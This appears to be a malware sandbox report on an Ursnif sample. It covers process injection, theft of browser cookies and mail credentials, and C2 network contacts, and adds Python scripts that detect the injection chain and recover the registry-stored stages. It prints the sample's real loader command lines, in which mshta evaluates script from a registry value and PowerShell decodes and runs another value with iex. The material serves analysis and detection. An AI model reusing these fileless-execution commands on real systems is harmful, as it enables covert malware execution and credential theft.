Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9F2000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 46C0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 5656
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424
Source: C:\Windows\explorer.exe Thread register set: target process: 3656
Source: C:\Windows\explorer.exe Thread register set: target process: 4268
Source: C:\Windows\explorer.exe Thread register set: target process: 4772
Source: C:\Windows\explorer.exe Thread register set: target process: 4620
Source: C:\Windows\explorer.exe Thread register set: target process: 6276
Source: C:\Windows\explorer.exe Thread register set: target process: 6488
Source: C:\Windows\System32\control.exe Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe Thread register set: target process: 5844
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF66A2D12E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 1B0000
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF66A2D12E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9F2000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 46C0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFEF000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
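Read together, the allocate / write / change-protection / create-thread events above are the raw material for an injection detection. Two things worth noticing in the data: the EIP values are the low 32 bits of addresses the same source process had just written (BD4F1580 against 7FFABD4F1580), and the protection on that address is toggled RWX, RX, RWX around each write. The script below is an added example, not part of the report or of the sandbox: it parses lines in the report's own format (a subset copied from this section and embedded as constructed input) and correlates them per source/target pair into the classic sequence. Function names and the output layout are ours.

```python
"""Correlate cross-process memory events (report line format) into
injection chains. Added illustration for this page; the SAMPLE lines are
copied from the report and embedded so the script runs offline."""
import json
import re
from collections import defaultdict
from ntpath import basename

# One regex for the four event kinds used here. Targets in this report
# contain no spaces, so \S+ is enough; a production parser should not rely
# on that.
EVENT_RE = re.compile(
    r"^Source: (?P<src>\S+) "
    r"(?P<kind>Memory allocated|Memory protected|Memory written|Thread created): "
    r"(?P<dst>\S+)"
    r"(?: base: (?P<addr>[0-9A-Fa-f]+))?"
    r"(?: EIP: (?P<eip>[0-9A-Fa-f]+))?"
    r"(?: protect: (?P<prot>.+?))?"
    r"(?: Jump to behavior)?$"
)

SAMPLE = r"""
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 1B0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF66A2D12E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 1B0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9F2000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
"""


def _is_rwx(prot):
    p = (prot or "").lower()
    return "execute" in p and "write" in p


def injection_chains(lines):
    """Group events by (source, target) and report, per pair: RWX regions
    that were allocated and then written, remote threads started inside a
    region the source wrote, and how often a page was flipped to RWX."""
    pairs = defaultdict(lambda: {"rwx_alloc": set(), "written": set(),
                                 "rwx_toggles": 0, "thread_eips": set()})
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        rec = pairs[(m["src"], m["dst"])]
        kind = m["kind"]
        if kind == "Memory allocated" and _is_rwx(m["prot"]):
            rec["rwx_alloc"].add(m["addr"].upper())
        elif kind == "Memory written":
            rec["written"].add(m["addr"].upper())
        elif kind == "Memory protected" and _is_rwx(m["prot"]):
            rec["rwx_toggles"] += 1
        elif kind == "Thread created":
            rec["thread_eips"].add(m["eip"].upper())

    findings = []
    for (src, dst), rec in sorted(pairs.items()):
        # EIP is printed as 32 bits while bases are 64-bit: compare on the
        # low 8 hex digits.
        low32 = {a[-8:].zfill(8): a for a in rec["written"]}
        thread_hits = sorted(low32[e.zfill(8)] for e in rec["thread_eips"]
                             if e.zfill(8) in low32)
        alloc_then_write = sorted(rec["rwx_alloc"] & rec["written"])
        if not (thread_hits or alloc_then_write):
            continue  # e.g. explorer.exe -> "unknown": no write observed
        findings.append({
            "source": basename(src), "target": basename(dst),
            "rwx_alloc_then_write": alloc_then_write,
            "thread_started_in_written_region": thread_hits,
            "rwx_protect_changes": rec["rwx_toggles"],
        })
    return findings


if __name__ == "__main__":
    print(json.dumps(injection_chains(SAMPLE.splitlines()), indent=2))
```

On this input the script yields three chains: loaddll32.exe allocating and filling an RWX region in control.exe, powershell.exe starting a thread in explorer.exe at an address it had written, and explorer.exe doing both against RuntimeBroker.exe with the protection flipped to RWX twice. The same correlation runs unchanged on ETW or EDR telemetry once the three event types are mapped to the same fields.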
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
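The mshta and powershell command lines above read both stages from the same registry key: mshta eval()s the value Audiinrt through WScript.Shell.regread, and the PowerShell it launches decodes a second value, Barclers, with [System.Text.Encoding]::ASCII.GetString and runs it with iex. Recovering those stages from a host therefore means exporting that key and decoding the values. The script below is an added example, not from the report or the sandbox: it extracts the key path and value names from the two command lines (copied from this section), then decodes the values from a .reg export. The .reg content is constructed placeholder data; the real value contents are not on this page. Helper names are ours.

```python
"""Recover registry-resident stages referenced by mshta/powershell command
lines. Added illustration; CMDLINES are copied from the report, REG_SAMPLE
is constructed placeholder data standing in for a real `reg export`."""
import re

CMDLINES = [
    r"""'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'""",
    r"""'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))""",
]

# Constructed export of the key; the hex value decodes to a harmless
# placeholder string, not the sample's real stage.
REG_SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E]
"Audiinrt"="/* constructed placeholder for the JScript stage */"
"Barclers"=hex:57,72,69,74,65,2d,4f,75,74,70,75,74,20,27,63,6f,\
  6e,73,74,72,75,63,74,65,64,20,73,74,61,67,65,27
'''

# JScript side: regread('HKCU\\...\\ValueName')
REGREAD_RE = re.compile(r"regread\('([^']+)'\)")
# PowerShell side: ( gp 'HKCU:Key' ).ValueName
GP_RE = re.compile(r"gp\s+'HKCU:([^']+)'\s*\)\.(\w+)")


def registry_refs(cmdline):
    """Return [(key_path, value_name), ...] for the registry values a
    command line reads, in HKEY_CURRENT_USER\... form."""
    refs = []
    for m in REGREAD_RE.finditer(cmdline):
        # The JScript literal escapes backslashes (up to three deep here);
        # collapse each run to a single separator.
        full = re.sub(r"\\{2,}", r"\\", m.group(1))
        key, _, value = full.rpartition("\\")
        refs.append((key.replace("HKCU\\", "HKEY_CURRENT_USER\\", 1), value))
    for m in GP_RE.finditer(cmdline):
        refs.append(("HKEY_CURRENT_USER\\" + m.group(1).lstrip("\\"), m.group(2)))
    return refs


def parse_reg_export(text):
    """Minimal .reg parser -> {key: {name: (type, data)}}. Handles REG_SZ
    ("...") and REG_BINARY (hex:..., with trailing-backslash continuation
    lines); other value types are ignored."""
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if line.endswith("\\"):          # hex data continues on the next line
            pending = line[:-1]
            continue
        name, _, data = line.partition("=")
        name = name.strip('"')
        if data.startswith("hex:"):
            keys[current][name] = ("REG_BINARY", bytes.fromhex(data[4:].replace(",", "")))
        elif data.startswith('"') and data.endswith('"'):
            keys[current][name] = ("REG_SZ", data[1:-1].replace('\\\\', '\\').replace('\\"', '"'))
    return keys


def recover_stages(cmdlines, reg_export):
    """Map value name -> decoded stage for every registry value the command
    lines reference and the export contains."""
    hive = parse_reg_export(reg_export)
    stages = {}
    for cmd in cmdlines:
        for key, value in registry_refs(cmd):
            vtype, data = hive.get(key, {}).get(value, (None, None))
            if vtype == "REG_BINARY":
                # Same mapping as [System.Text.Encoding]::ASCII.GetString;
                # bytes above 0x7F become replacement characters.
                stages[value] = data.decode("ascii", "replace")
            elif vtype == "REG_SZ":
                stages[value] = data
    return stages


if __name__ == "__main__":
    for name, body in recover_stages(CMDLINES, REG_SAMPLE).items():
        print(f"{name}: {body}")
```

On the infected host, `reg export "HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E" dump.reg` produces the input; reg.exe writes UTF-16LE, so open the file with encoding="utf-16" before passing it in. Only REG_SZ and hex: (REG_BINARY) values are handled, which is all the two command lines reference.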

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F3A446 cpuid 0_2_02F3A446
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_004053A0
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetACP, 0_2_0040C3B0
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_0040ADFC
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_0040AE48
Source: C:\Windows\System32\loaddll32.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_004054AC
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_00405C96
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_00405C98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 1_2_004053A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetACP, 1_2_0040C3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 1_2_0040ADFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 1_2_0040AE48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 1_2_004054AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 1_2_00405C96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 1_2_00405C98
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004098C8 GetLocalTime, 0_2_004098C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F3A446 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_02F3A446
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00453E60 GetVersion, 0_2_00453E60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY

Behavior Graph

Behavior Graph ID: 350433   Sample: yytr.dll   Startdate: 09/02/2021   Architecture: WINDOWS   Score: 100

Process tree reconstructed from the graph ("started" = process created by its parent, "injected" = existing process written into). Signatures and network contacts are listed under the process the graph attributes them to.

yytr.dll (sample)
    DNS: 8.8.8.8.in-addr.arpa, 1.0.0.127.in-addr.arpa, resolver1.opendns.com
    Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Multi AV Scanner detection for submitted file; 9 other signatures
    mshta.exe (started)
        Signatures: Suspicious powershell command line found
        powershell.exe (started)
            Dropped: C:\Users\user\AppData\...\qxfma03s.cmdline (UTF-8); C:\Users\user\AppData\Local\...\maejgtwh.0.cs (UTF-8)
            Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Compiles code for process injection (via .Net compiler)
            explorer.exe (injected)
                Network: eorctconthoelrrpentshfex.com 45.67.231.135 port 443 (SERVERIUS-ASNL, Moldova Republic of); mozilla.cloudflare-dns.com 104.16.249.249 ports 443, 49794, 49795 (CLOUDFLARENETUS, United States)
                Signatures: Tries to steal Mail credentials (via file access); Changes memory attributes in foreign processes to executable or writable; Tries to harvest and steal browser information (history, passwords, etc); 6 other signatures
                RuntimeBroker.exe (injected)
            csc.exe (started)
                Dropped: C:\Users\user\AppData\Local\...\qxfma03s.dll (PE32)
                cvtres.exe (started)
            csc.exe (started)
                Dropped: C:\Users\user\AppData\Local\...\maejgtwh.dll (PE32)
                cvtres.exe (started)
            conhost.exe (started)
    loaddll32.exe (started)
        Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Modifies the context of a thread in another process (thread injection); 4 other signatures
        control.exe (started)
            Signatures: Changes memory attributes in foreign processes to executable or writable; Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)
        rundll32.exe (started)
            Signatures: Contains functionality to detect sleep reduction / modifications
            WerFault.exe (started)
    iexplore.exe (started)
        iexplore.exe (started)
            Network: assets.onestore.ms; consentdeliveryfd.azurefd.net; ajax.aspnetcdn.com
    2 other processes (collapsed in the graph)
        iexplore.exe (started)
